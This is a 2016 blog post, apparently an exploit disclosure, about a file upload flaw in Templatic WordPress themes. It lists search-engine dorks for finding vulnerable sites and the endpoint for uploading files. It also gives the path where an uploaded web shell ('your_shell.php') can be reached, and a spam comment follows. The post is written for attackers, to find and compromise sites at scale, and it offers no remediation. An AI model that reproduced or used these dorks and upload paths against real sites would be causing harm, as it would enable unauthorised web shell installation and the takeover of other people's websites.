Wednesday, September 14, 2016

Wordpress Templatic Themes CSRF File Upload Vulnerability

#Title : Wordpress Templatic Themes
CSRF File Upload Vulnerability
[Monetize Uploader]

#Author : mdhaxor

#Category : Web Applications

#Type : PHP

#Vendor : http://templatic.com/


#Download : http://templatic.com/
wordpress-themes-store/

#Tested : Mozila, Chrome, Opera ->
Windows & Linux

#Vulnerabillity : CSRF


#DORK :

inurl:/wp-content/themes/Realestate/


inurl:/wp-content/themes/dailydeal/

inurl:/wp-content/themes/nightlife/

inurl:/wp-content/themes/5star/


inurl:/wp-content/themes/specialist/


CSRF File Upload Vulnerability



Exploit & POC : http://site-target/wp-
content/themes/Realestate/Monetize/
general/upload-file.php




File Access :


http://site-target/wp-content/themes/
Realestate/images/tmp/your_shell.php


Note : make sure the
Script CSRF equate with dork you use


Thatz All....
Posted by at

1 comment:

  1. kjhjNovember 2, 2017 at 9:09 AM

    Awesome Blog!! Highly Informative Post. Very Thanks for sharing this information with us.Please Check out our newly pre launch projects Gbp Athens Floor Plan.

    ReplyDelete

Subscribe to: Post Comments (Atom)